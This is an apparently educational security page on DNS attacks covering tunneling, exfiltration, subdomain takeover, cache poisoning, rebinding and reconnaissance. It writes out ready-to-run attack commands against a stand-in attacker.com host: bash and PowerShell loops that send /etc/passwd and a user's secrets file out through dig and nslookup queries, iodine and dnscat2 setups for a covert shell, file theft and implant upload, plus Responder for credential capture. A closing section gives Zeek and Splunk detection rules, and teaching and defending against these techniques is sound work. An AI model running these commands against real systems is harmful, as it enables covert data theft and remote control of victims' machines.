DNS Attacks & Tunneling NEW
DNS is the phone book of the internet—and one of the most overlooked attack vectors. It's allowed through almost every firewall, rarely inspected deeply, and can be weaponized for exfiltration, C2 communication, and infrastructure attacks.
Why DNS Is Dangerous
DNS traffic is almost never blocked. Even the most restrictive firewalls allow DNS (port 53) because nothing works without it. This makes DNS the perfect covert channel—hiding malicious traffic in plain sight.
DNS Attack Surface
┌─────────────────────────────────────────────────────────────────────────────┐
│ DNS ATTACK VECTORS │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ EXFILTRATION C2 CHANNELS INFRASTRUCTURE │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ • DNS Tunneling │ │ • DNS-over-HTTPS│ │ • Cache │ │
│ │ • TXT Record │ │ • Encoded │ │ Poisoning │ │
│ │ Exfil │ │ Commands │ │ • Subdomain │ │
│ │ • Subdomain │ │ • Polling via │ │ Takeover │ │
│ │ Encoding │ │ DNS Queries │ │ • DNS Hijacking │ │
│ └─────────────────┘ └─────────────────┘ │ • DNS Rebinding │ │
│ └─────────────────┘ │
│ │
│ RECONNAISSANCE DENIAL OF SERVICE │
│ ┌─────────────────┐ ┌─────────────────┐ │
│ │ • Zone Transfer │ │ • DNS │ │
│ │ • Subdomain │ │ Amplification │ │
│ │ Enumeration │ │ • NXDOMAIN │ │
│ │ • Reverse DNS │ │ Flooding │ │
│ └─────────────────┘ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
DNS Tunneling
Encode arbitrary data in DNS queries and responses. Since DNS is rarely blocked, this provides a covert channel that bypasses most security controls.
How It Works
Concept: DNS Tunneling
# Data encoded in subdomain of attacker-controlled domain
# Victim → DNS Query → Attacker's Authoritative DNS Server
# Exfiltrating "secret data":
# 1. Encode data: "secret data" → base32 → "ONXW2ZLUNBUW4ZY"
# 2. Send as DNS query: ONXW2ZLUNBUW4ZY.data.attacker.com
# 3. Attacker's DNS server receives query, decodes subdomain
# 4. Response can contain commands (in TXT, CNAME, or other records)
# Query flow:
Victim Machine
↓ DNS Query: ONXW2ZLUNBUW4ZY.data.attacker.com
Corporate DNS Resolver
↓ Recursive query (allowed through firewall)
Attacker's DNS Server (ns1.attacker.com)
↓ Decodes: "secret data"
↓ Returns: TXT "bmV4dCBjb21tYW5k" (base64 "next command")
Response flows back to victimDNS Tunneling Tools
Bash: iodine DNS Tunnel
# iodine - IP over DNS tunneling
# Server side (attacker's authoritative DNS for tunnel.attacker.com)
iodined -f -c -P secretpassword 10.0.0.1 tunnel.attacker.com
# Client side (victim network)
iodine -f -P secretpassword tunnel.attacker.com
# Result: Full IP tunnel over DNS
# - Client gets IP 10.0.0.2
# - Can SSH, browse, anything over the tunnel
# - All traffic encoded in DNS queries/responses
# Speed: ~50-100 KB/s (slow but stealthy)
Bash: dnscat2 C2 Channel
# dnscat2 - C2 over DNS
# Server (attacker)
dnscat2-server tunnel.attacker.com --secret=mysecret
# Client (victim)
./dnscat --secret=mysecret tunnel.attacker.com
# Server commands:
dnscat2> sessions # List sessions
dnscat2> session -i 1 # Interact with session
command (victim01)> shell # Get shell
command (victim01)> download /etc/passwd
command (victim01)> upload implant.sh /tmp/
DNSExfiltrator
Data Exfil
Lightweight DNS exfiltration tool with AES encryption.
python dnsexfiltrator.py -d attacker.com -f secret.docx
DNS Data Exfiltration
Bash: Simple DNS Exfiltration
# Exfiltrate file contents via DNS queries
# Each query sends a chunk of data
# Encode and send file
cat /etc/passwd | base64 | tr -d '\n' | fold -w 60 | \
while read chunk; do
dig +short $chunk.exfil.attacker.com
sleep 0.5 # Avoid rate limiting
done
# On attacker's DNS server, log all queries:
# tcpdump -i eth0 -n port 53 | grep exfil.attacker.com
# Decode received data:
cat dns_queries.log | awk -F'.' '{print $1}' | base64 -dTXT Record Exfiltration
PowerShell: Windows DNS Exfil
# Exfiltrate data from Windows using nslookup
$data = Get-Content C:\Users\victim\secrets.txt
$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($data))
$chunks = $encoded -split '(.{60})' | Where-Object { $_ }
foreach ($chunk in $chunks) {
nslookup -type=TXT "$chunk.exfil.attacker.com" 2>$null
Start-Sleep -Milliseconds 500
}
# Advantage: Uses built-in Windows tools
# No malware signature, just DNS queriesSubdomain Takeover
When a subdomain points to a service that's been decommissioned (AWS, Azure, GitHub Pages, Heroku), attackers can claim that service and control the subdomain.
Concept: Subdomain Takeover
# Scenario:
# 1. Company creates blog.company.com → CNAME → company.github.io
# 2. Company deletes GitHub Pages repo
# 3. DNS CNAME still points to company.github.io
# 4. Attacker creates repo "company.github.io" in their GitHub
# 5. Attacker now controls blog.company.com!
# Vulnerable CNAME patterns:
# *.amazonaws.com (S3 buckets)
# *.cloudfront.net (CloudFront distributions)
# *.github.io (GitHub Pages)
# *.herokuapp.com (Heroku apps)
# *.azurewebsites.net (Azure Web Apps)
# *.trafficmanager.net (Azure Traffic Manager)
# Detection:
dig blog.company.com CNAME
# Returns: company.github.io
# But company.github.io returns 404 = VULNERABLE!
Subjack
Subdomain Takeover
Scan for subdomain takeover vulnerabilities at scale.
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
Nuclei
Takeover Templates
Comprehensive takeover detection with fingerprint templates.
nuclei -l subdomains.txt -t takeovers/
DNS Cache Poisoning
Inject malicious DNS records into a resolver's cache, redirecting all users of that resolver to attacker-controlled servers.
Concept: Cache Poisoning (Kaminsky Attack)
# Classic Kaminsky Attack (2008)
# Goal: Poison resolver's cache for target.com
# 1. Attacker triggers resolver to query random.target.com
# 2. Before real response arrives, attacker floods resolver with:
# - Spoofed responses for random.target.com
# - Each response includes "Additional" section:
# "ns1.target.com = attacker_ip" (glue record)
# 3. If attacker guesses transaction ID (16-bit = 65536 possibilities)
# Resolver caches: ns1.target.com = attacker_ip
# 4. ALL future queries for *.target.com go to attacker
# Modern mitigations:
# - Source port randomization (adds ~16 bits entropy)
# - DNSSEC (cryptographic validation)
# - DNS cookies
# - Response rate limiting
# But many resolvers still vulnerable to variants!DNS Rebinding
Bypass same-origin policy by manipulating DNS responses. First resolve to attacker server, then "rebind" to internal IP, allowing JavaScript to access internal resources.
Concept: DNS Rebinding Attack
# Attack flow:
# 1. Victim visits attacker.com
# 2. DNS: attacker.com → 1.2.3.4 (attacker server), TTL=0
# 3. Page loads JavaScript from attacker server
# 4. JavaScript makes request to attacker.com/api
# 5. DNS rebinds: attacker.com → 192.168.1.1 (router!)
# 6. Request goes to internal router (same origin = attacker.com)
# 7. JavaScript reads response from internal device!
# Uses:
# - Access internal web interfaces (routers, printers, IoT)
# - Scan internal network from victim's browser
# - Exploit internal services (default credentials)
# - Exfiltrate data from intranet
# Tools:
# - Singularity (https://github.com/nccgroup/singularity)
# - rbndr (https://github.com/taviso/rbndr)
Singularity
DNS Rebinding Framework
Complete DNS rebinding attack platform with web interface.
github.com/nccgroup/singularityDNS Reconnaissance
Zone Transfer (AXFR)
Bash: DNS Zone Transfer
# Attempt zone transfer - reveals ALL DNS records
dig axfr target.com @ns1.target.com
# If successful, returns:
# - All subdomains
# - All IP addresses
# - Mail servers
# - Internal naming conventions
# - Sometimes internal IPs!
# Most servers block AXFR, but always worth trying
# Alternative: dnsrecon
dnsrecon -d target.com -t axfrSubdomain Enumeration
Bash: Subdomain Discovery
# Passive enumeration (no direct queries to target)
subfinder -d target.com -silent
amass enum -passive -d target.com
# Active enumeration (queries target DNS)
amass enum -active -d target.com -brute
gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
# Certificate transparency logs
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Combine results
cat passive.txt active.txt crtsh.txt | sort -u > all_subdomains.txtDetecting DNS Attacks
DNS Attack Indicators
- Tunneling: High volume of TXT queries, long subdomain labels, high entropy in queries
- Exfiltration: Queries to unusual domains, base64-like patterns in subdomains
- Cache poisoning: Unexpected DNS responses, DNSSEC validation failures
- Rebinding: TTL=0 responses, rapid IP changes for same domain
Detection: Suspicious DNS Patterns
# High-entropy subdomain detection (tunneling indicator)
# Normal: www.company.com, mail.company.com
# Suspicious: aGVsbG8gd29ybGQ.data.attacker.com
# Zeek/Bro rule for long subdomains:
event dns_request(c: connection, msg: dns_msg, query: string) {
local labels = split_string(query, /\./);
for (i in labels) {
if (|labels[i]| > 50) {
NOTICE([$note=DNS::Tunneling_Indicator,
$msg=fmt("Long DNS label: %s", query)]);
}
}
}
# Splunk query for DNS exfil patterns:
index=dns | eval label_len=len(mvindex(split(query,"."),0))
| where label_len > 40 | stats count by queryDNS Attack Tools
iodine
IP over DNS
Full IP tunnel through DNS queries. Bypass any firewall.
github.com/yarrick/iodine
DNSChef
DNS Proxy
Highly configurable DNS proxy for penetration testing.
dnschef --fakeip=192.168.1.100 --fakedomains=*.target.com
Responder
LLMNR/NBT-NS
Poison LLMNR/NBT-NS/mDNS responses to capture credentials.
responder -I eth0 -wrf
Subfinder
Subdomain Enum
Fast passive subdomain enumeration.
subfinder -d target.com -all -silent
MassDNS
Bulk Resolution
High-performance DNS stub resolver for bulk lookups.
massdns -r resolvers.txt -t A -o S domains.txt